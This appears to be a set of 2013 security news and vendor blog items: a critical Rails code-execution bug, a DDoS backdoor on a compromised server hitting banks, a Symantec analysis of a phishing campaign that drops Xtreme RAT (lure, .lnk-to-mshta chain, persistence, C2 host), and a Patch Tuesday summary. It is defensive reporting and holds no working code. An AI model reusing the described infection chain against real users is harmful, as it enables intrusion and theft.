Extremely critical Ruby on Rails bug threatens more than 200,000 sites

Hundreds of thousands of websites are potentially at risk following the discovery of an extremely critical vulnerability in the Ruby on Rails framework that gives remote attackers the ability to execute malicious code on the underlying servers.

The bug is present in Rails versions spanning the past six years and in default configurations gives hackers a simple and reliable way to pilfer database contents, run system commands, and cause websites to crash, according to Ben Murphy, one of the developers who has confirmed the vulnerability. As of last week, the framework was used by more than 240,000 websites, including Github, Hulu, and Basecamp, underscoring the seriousness of the threat.

"It is quite bad," Murphy told Ars. "An attack can send a request to any Ruby on Rails sever and then execute arbitrary commands. Even though it's complex, it's reliable, so it will work 100 percent of the time."

Read 3 remaining paragraphs | Comments

Secret footsoldier targeting banks reveals meaner, leaner face of DDoS

Screenshots showing the denial-of-service PHP script before and after it has been decoded.

Over the past two weeks, a new wave of Web attacks has battered major US banks, causing disruptions for many of their online services. Now, an Israel-based security firm has uncovered one of the secret footsoldiers behind the mass assault: a compromised website that was rigged to unleash a torrent of junk traffic on three of the world's biggest financial institutions.

The discovery by Web application security firm Incapsula helps explain the strategy behind the four-month-old campaign, which has been carried out under the flag of a group calling itself Izz ad-Din al-Qassam—rather than compromise and recruit thousands or tens of thousands of end-user PCs to carry out the distributed denial-of-service attacks, why not target a handful of Web servers that have orders of magnitude more bandwidth and processing power?

Over the weekend, Incapsula researchers noticed a general-interest website located in the UK that was exhibiting suspicious behavior. They quickly discovered a backdoor that had been planted on it that was programmed to receive instructions from remote attackers. An analysis showed the website, which had just recently contracted with Incapsula, was being directed to send a flood of HTTP and UDP packets to major banks including PNC Financial Services, HSBC, and Fifth Third Bank.

Read 7 remaining paragraphs | Comments

W32.Extrat: Syrian Conflict Used To Deliver Xtreme RAT

Contributor: Jeet Morparia
 

As conflict in Syria continues, email attacks against various organizations throughout the Middle East and Europe have also been identified.
 

Figure 1. Sample email used in this campaign from “Free Dom” (Freedom)
 

The targeted organizations are extensive, from individuals at a public university, to hotels, oil companies, and government agencies.

Recipients of these emails are presented with text in Arabic. The email (Figure 1) claims to be an important message from Sheikh Adnan al-Aroor, a figure in opposition to the current Syrian government. The email includes a .zip file attachment, which contains a .lnk (shortcut) file.

In the past, we have blogged about .lnk files being used in other attacks. This particular attack relies on social engineering.
 

Figure 2. Properties of .lnk file used in this campaign
 

The .lnk file (detected as Downloader) contains a reference to MSHTA.exe, the Microsoft HTML Application Host file. The target of the .lnk file is passed an argument that points to an HTML file hosted on a malicious website.

The HTML file contains a combination of Visual Basic scripting as well as an embedded executable. The script is responsible for dropping the 1.exe file onto the compromised computer and executing it. This file is an executable compiled with an AutoIt script.

Once this file is executed, it copies itself to a temporary folder on the computer as a svhost.exe file. It also creates the following files in a specified temporary folder:

  • Microsoft.vbs
  • once.txt
  • start.cmd
  • svhost.exe

Figure 3. Document file used as smoke screen
 

The threat then creates registry entries so that it executes every time Windows starts. It also drops an araor.doc file (Figure 3) in the %Temp% folder and opens it. This file contains text that ties into the original lure: a message from Sheikh Adnan al-Aroor. This is a smoke screen to give the campaign an air of legitimacy. In actuality, the user is now infected with Xtreme RAT, which Symantec detects as W32.Extrat.

Xtreme RAT is a Remote Administration Tool (RAT) that allows a remote user to monitor keystrokes and steal information from the compromised computer. In this particular sample, we observed outbound connectivity to tn5.linkpc.net on port 82.
 

Figure 4. Another smoke screen from a similar campaign
 

Presently there are other campaigns attempting to spread W32.Extrat, including one that was virtually the same—just using a different lure. In the preceding Figure 4, you can see the smoke screen document used in that particular campaign.

This is not the first time that we have seen malware used during a time of conflict in the Middle East and it will not likely be the last.

Microsoft Patch Tuesday – January 2013

Hello, welcome to this month's blog on the Microsoft patch release. This month the vendor is releasing seven bulletins covering a total of 12 vulnerabilities. Three of this month's issues are rated ’Critical’.

As always, customers are advised to follow these security best practices:

  • Install vendor patches as soon as they are available.
  • Run all software with the least privileges required while still maintaining functionality.
  • Avoid handling files from unknown or questionable sources.
  • Never visit sites of unknown or questionable integrity.
  • Block external access at the network perimeter to all key systems unless specific access is required.

Microsoft's summary of the January releases can be found here:
http://technet.microsoft.com/en-us/security/bulletin/ms13-Jan

The following is a breakdown of the issues being addressed this month:

  1. MS13-001 Vulnerability in Windows Print Spooler Components Could Allow Remote Code Execution

    Windows Print Spooler Components Vulnerability (CVE-2013-0011) MS Rating: Critical

    A remote code execution vulnerability exists in the way that Microsoft Windows handles a malformed print spooler response to a client request. The vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code.

  2. MS13-002 Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution

    MSXML Integer Truncation Vulnerability (CVE-2013-0006) MS Rating: Critical

    A remote code execution vulnerability exists in the way that Microsoft Windows parses XML content. The vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user.

    MSXML XSLT Vulnerability (CVE-2013-0007) MS Rating: Critical

    A remote code execution vulnerability exists in the way that Microsoft Windows parses XML content. The vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user.

  3. MS13-003 Vulnerabilities in System Center Operations Manager Could Allow Elevation of Privilege

    System Center Operations Manager Web Console XSS Vulnerability (CVE-2013-0009) MS Rating: Important

    A cross-site scripting (XSS) vulnerability exists in the System Center Operations Manager that could allow specially crafted script code to run under the guise of the server. This is a non-persistent cross-site scripting vulnerability that could allow an attacker to issue commands to the System Center Operations Manager server in the context of the targeted user.

    System Center Operations Manager Web Console XSS Vulnerability (CVE-2013-0010) MS Rating: Important

    A cross-site scripting (XSS) vulnerability exists in the System Center Operations Manager that could allow specially crafted script code to run under the guise of the server. This is a non-persistent cross-site scripting vulnerability that could allow an attacker to issue commands to the System Center Operations Manager server in the context of the targeted user.

  4. MS13-004 Vulnerability in .NET Framework Could Allow Elevation of Privilege

    System Drawing Information Disclosure Vulnerability (CVE-2013-0001) MS Rating: Moderate

    An information disclosure vulnerability exists in the way that the Windows Forms in the .NET Framework handles pointers to unmanaged memory locations.

    WinForms Buffer Overflow Vulnerability (CVE-2013-0002) MS Rating: Important

    An elevation of privilege vulnerability exists in the way that the Windows Forms in the .NET Framework validates the number of objects in memory before copying those objects into an array.

    S.DS.P Buffer Overflow Vulnerability (CVE-2013-0003) MS Rating: Important

    An elevation of privilege vulnerability exists in the way that the System.DirectoryServices.Protocols (S.DS.P) in the .NET Framework validates the size of objects in memory prior to copying those objects into an array.

    Double Construction Vulnerability (CVE-2013-0004) MS Rating: Important

    An elevation of privilege vulnerability exists in the way that the .NET Framework validates the permissions of certain objects in memory. An attacker who successfully exploited this vulnerability could take complete control of an affected system.

  5. MS13-005 Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege

    Win32k Improper Message Handling Vulnerability (CVE-2013-0008) MS Rating: Important

    An elevation of privilege vulnerability exists when the Windows kernel improperly handles window broadcast messages.

  6. MS13-006 Vulnerability in Microsoft Windows Could Allow Security Feature Bypass

    Microsoft SSL Version 3 and TLS Protocol Security Feature Bypass Vulnerability (CVE-2013-0013) MS Rating: Important

    A security feature bypass vulnerability exists in the way that the Microsoft Windows SSL/TLS (Secure Socket Layer and Transport Layer Security) handles the SSL version 3 (SSLv3) and TLS protocols. The vulnerability could allow a security feature bypass if an attacker injects specially crafted content into an SSL/TLS session.

  7. MS13-007 Vulnerability in Open Data Protocol Could Allow Denial of Service

    Replace Denial of Service Vulnerability (CVE-2013-0005) MS Rating: Important

    A denial of service vulnerability exists in the OData specification that could allow a denial of service. The vulnerability could cause the server or service to stop responding and restart.

More information on the vulnerabilities being addressed this month is available at Symantec's free SecurityFocus portal and to our customers through the DeepSight Threat Management System.